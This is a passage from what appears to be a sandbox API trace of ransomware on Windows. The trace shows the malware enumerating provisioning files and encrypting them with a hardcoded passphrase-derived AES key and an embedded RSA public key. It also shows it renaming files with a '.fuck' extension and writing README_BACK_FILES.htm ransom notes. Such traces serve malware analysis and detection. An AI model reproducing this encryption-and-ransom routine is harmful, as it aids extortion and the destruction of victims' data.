FindClose (in: hFindFile=0x2817098 | out: hFindFile=0x2817098) returned 1 [0237.365] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\readme_back_files.htm")) returned 0xffffffff [0237.365] AreFileApisANSI () returned 1 [0237.365] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 100 [0237.365] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.366] GetLastError () returned 0x5 [0237.366] GetLastError () returned 0x5 [0237.366] FindNextFileA (in: hFindFile=0x2816f58, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0237.366] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x2845de0 [0237.366] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.366] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.366] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0237.366] GetLastError () returned 0x5 [0237.366] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml")) returned 0x20 [0237.367] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml", dwFileAttributes=0x80) returned 0 [0237.367] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.368] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.368] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml.gsg", dwFileAttributes=0x2) returned 0 [0237.368] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x28442a8) returned 1 [0237.373] CryptCreateHash (in: hProv=0x28442a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0237.373] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.374] CryptHashData (hHash=0x2845e20, pbData=0x2ecb20, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.374] CryptDeriveKey (in: hProv=0x28442a8, Algid=0x6610, hBaseData=0x2845e20, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x2846460) returned 1 [0237.374] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.374] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0237.374] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x2844770) returned 1 [0237.375] CryptImportPublicKeyInfo (in: hCryptProv=0x2844770, dwCertEncodingType=0x1, pInfo=0x283bcb8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x283bce8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x283bcf0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x28464a0) returned 1 [0237.375] CryptEncrypt (in: hKey=0x28464a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0237.375] CryptEncrypt (in: hKey=0x28464a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2843de0*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x2843de0*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0237.375] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2843de0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.376] ReadFile (in: hFile=0xffffffff, lpBuffer=0x276d6a0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x276d6a0, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0237.376] CryptEncrypt (in: hKey=0x2846460, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x276d6a0*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x276d6a0*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0237.376] WriteFile (in: hFile=0xffffffff, lpBuffer=0x276d6a0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.376] CloseHandle (hObject=0xffffffff) returned 1 [0237.376] CloseHandle (hObject=0xffffffff) returned 1 [0237.376] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml"), bFailIfExists=0) returned 0 [0237.376] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml", dwFileAttributes=0x0) returned 0 [0237.377] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml.gsg")) returned 0 [0237.377] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml.fuck")) returned 0 [0237.377] CryptDestroyHash (hHash=0x2845e20) returned 1 [0237.377] CryptDestroyKey (hKey=0x2846460) returned 1 [0237.377] CryptReleaseContext (hProv=0x28442a8, dwFlags=0x0) returned 1 [0237.377] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.377] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0237.377] GetLastError () returned 0x5 [0237.378] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\masterdatastore.xml")) returned 0x20 [0237.378] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\MasterDatastore.xml", dwFileAttributes=0x80) returned 0 [0237.378] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.378] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\MasterDatastore.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\masterdatastore.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.379] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\MasterDatastore.xml.gsg", dwFileAttributes=0x2) returned 0 [0237.379] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x2844088) returned 1 [0237.384] CryptCreateHash (in: hProv=0x2844088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0237.384] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.384] CryptHashData (hHash=0x28461e0, pbData=0x2ecaf8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.384] CryptDeriveKey (in: hProv=0x2844088, Algid=0x6610, hBaseData=0x28461e0, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x2846320) returned 1 [0237.384] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.384] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0237.384] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x2843f78) returned 1 [0237.386] CryptImportPublicKeyInfo (in: hCryptProv=0x2843f78, dwCertEncodingType=0x1, pInfo=0x283a528*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x283a558*, PublicKey.cbData=0x8c, PublicKey.pbData=0x283a560*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x2845da0) returned 1 [0237.387] CryptEncrypt (in: hKey=0x2845da0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0237.387] CryptEncrypt (in: hKey=0x2845da0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28445d8*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x28445d8*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0237.387] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28445d8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.387] ReadFile (in: hFile=0xffffffff, lpBuffer=0x276d6a0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x276d6a0, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0237.387] CryptEncrypt (in: hKey=0x2846320, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x276d6a0*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x276d6a0*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0237.387] WriteFile (in: hFile=0xffffffff, lpBuffer=0x276d6a0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.387] CloseHandle (hObject=0xffffffff) returned 1 [0237.387] CloseHandle (hObject=0xffffffff) returned 1 [0237.387] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\MasterDatastore.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\masterdatastore.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\masterdatastore.xml"), bFailIfExists=0) returned 0 [0237.388] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\MasterDatastore.xml", dwFileAttributes=0x0) returned 0 [0237.388] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\MasterDatastore.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\masterdatastore.xml.gsg")) returned 0 [0237.388] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\masterdatastore.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\MasterDatastore.xml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\masterdatastore.xml.fuck")) returned 0 [0237.389] CryptDestroyHash (hHash=0x28461e0) returned 1 [0237.389] CryptDestroyKey (hKey=0x2846320) returned 1 [0237.389] CryptReleaseContext (hProv=0x2844088, dwFlags=0x0) returned 1 [0237.389] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.389] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x2845f60 [0237.390] FindNextFileA (in: hFindFile=0x2845f60, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0237.390] FindNextFileA (in: hFindFile=0x2845f60, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0237.390] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x2846460 [0237.390] FindNextFileA (in: hFindFile=0x2846460, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0237.390] FindNextFileA (in: hFindFile=0x2846460, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0237.390] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0237.390] GetLastError () returned 0x5 [0237.390] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\power_0.provxml")) returned 0x20 [0237.390] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x80) returned 0 [0237.391] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\power_0.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.391] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\power_0.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.391] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\Power_0.provxml.gsg", dwFileAttributes=0x2) returned 0 [0237.392] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x2844c38) returned 1 [0237.398] CryptCreateHash (in: hProv=0x2844c38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0237.398] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.398] CryptHashData (hHash=0x2845e20, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.398] CryptDeriveKey (in: hProv=0x2844c38, Algid=0x6610, hBaseData=0x2845e20, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28464e0) returned 1 [0237.398] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.398] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0237.398] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x2844dd0) returned 1 [0237.400] CryptImportPublicKeyInfo (in: hCryptProv=0x2844dd0, dwCertEncodingType=0x1, pInfo=0x283c408*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x283c438*, PublicKey.cbData=0x8c, PublicKey.pbData=0x283c440*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28461e0) returned 1 [0237.400] CryptEncrypt (in: hKey=0x28461e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0237.400] CryptEncrypt (in: hKey=0x28461e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2844000*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x2844000*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0237.400] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2844000, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.400] ReadFile (in: hFile=0xffffffff, lpBuffer=0x284ad40, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x284ad40, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0237.400] CryptEncrypt (in: hKey=0x28464e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x284ad40*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x284ad40*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0237.401] WriteFile (in: hFile=0xffffffff, lpBuffer=0x284ad40, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.401] CloseHandle (hObject=0xffffffff) returned 1 [0237.401] CloseHandle (hObject=0xffffffff) returned 1 [0237.401] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\power_0.provxml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\power_0.provxml"), bFailIfExists=0) returned 0 [0237.403] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x0) returned 0 [0237.403] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\power_0.provxml.gsg")) returned 0 [0237.404] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\power_0.provxml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\Power_0.provxml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\power_0.provxml.fuck")) returned 0 [0237.404] CryptDestroyHash (hHash=0x2845e20) returned 1 [0237.404] CryptDestroyKey (hKey=0x28464e0) returned 1 [0237.404] CryptReleaseContext (hProv=0x2844c38, dwFlags=0x0) returned 1 [0237.404] FindNextFileA (in: hFindFile=0x2846460, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0237.404] FindClose (in: hFindFile=0x2846460 | out: hFindFile=0x2846460) returned 1 [0237.404] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\readme_back_files.htm")) returned 0xffffffff [0237.405] AreFileApisANSI () returned 1 [0237.405] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2844bb0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 113 [0237.405] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: 